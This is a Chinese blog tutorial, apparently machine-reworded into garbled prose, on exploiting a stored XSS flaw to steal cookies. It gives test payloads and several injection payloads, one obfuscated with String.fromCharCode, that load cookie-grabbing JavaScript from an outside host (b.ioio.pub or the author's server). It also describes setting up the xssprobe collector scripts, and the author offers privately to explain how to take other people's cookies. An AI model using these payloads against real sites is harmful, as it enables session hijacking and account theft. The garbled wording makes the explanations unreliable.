上一篇文章谈到了XSS原理,我坚信每个人都对XSS原理有一定的掌握。今天,让我们分享XSS系统漏洞的案例。
自然环境:
Window764位集
搜狗浏览器到位
外网云服务器(自己买的...)
一个XSS网址是可用的。
为Cookie获取一组JS代码
好了,下面是必须提前准备的物品。如果没有外部云服务器(外部IP),可以使用XSS的发布服务平台。如何在自己的科研下使用(我的在线服务器也不公布,太差了,不能只公布测试...)
现在大家才开始一步步利用XSS系统的漏洞。
0x0...皮皮猎.....我浏览了Kex的网站。
(网站发布在这里,方便同学们自己学习,训练,测试。请不要闹事,避免从新手XSS到公安局入门。)
0x01我刚开始检查有没有X(一切正常)
#经典测试程序 <script>alert(1)</script> #猥亵版测试程序(必须在火狐插件firebug中查询防御性好不容易被管理人员发觉相对性d出窗口) console.log(1)0x02啊啊啊啊...d出窗口(XSS被清楚地存储)
在日记标题中插入测试程序,点击浏览(表格(不需要)会被公布...它将得到管理层的批准)
0x03清除存储的XSS...可以使用...呵呵....
再说一遍XSS的工资。
<script src='http://b.ioio.pub/xss/probe.js'</script> <img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http:// b.ioio.pub/xss/probe.js'";> <svg onload=s=createElement('script');body.appendChild(s);s.src='http:// b.ioio.pub/xss/probe.js> <svg onload= eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109, 101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,9 7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114, 99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98, 47,120,115,115,47,112,114,111,98,101,46,106,115)) >当上面的logo打开时,会从遥控器加载JS代码,也就是说你可以通过改变遥控器的JS代码来完成不同的功能。
大家也看到了上面的连接,无疑不是我的...它来自上级JS获取COOKIE代码。
分享:
https://github.com/evilcos/xssprobe关键文档有三个,告诉你这三个脚本是干什么用的,详细介绍编码含义,不太实际。
第一个:
这一脚本制作便是必须远程控制载入的JS获得Cookie的编码(能够下载一下放进自身的网络服务器上或XSS服务平台) 里边有一段必须改动的地区 http_server = " # 这一段必须改动给自己网络服务器的详细地址和接纳数据信息的PHP文档第二个:
这一便是上边提及的必须接纳数据信息的PHP文档这一文档不用改动。 其功效是将接纳的数据信息载入到第三个文档中。第三个:
它是便是你获得cookie后显示信息cookie的地区。根据第一文档获得到cookie随后传个第二个文档由第二个 文档载入到这一文档中显示信息出去。0x04刚开始用...结构利用编码。
<script src='http://xx.xx.xx.xx/xsstest.js' /> (xx.xx.xx.xx是我的云服务器)好了,结构准备好了,接下来测试一下是否成功...检查你申请的账户...(如何拿到别人的cookie,看你自己的想法,需要私聊我会告诉你...)
好的...现在看设计效果图。....
现在每个人都成功地得到了自己的饼干...O(∩_∩)O~
(再次声明,请学生不要制造麻烦,只是为了测试应用程序...)
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)